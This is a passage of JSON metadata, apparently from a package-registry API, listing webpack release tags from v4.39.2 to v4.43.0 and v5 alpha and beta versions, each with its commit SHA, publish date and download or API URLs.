kg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2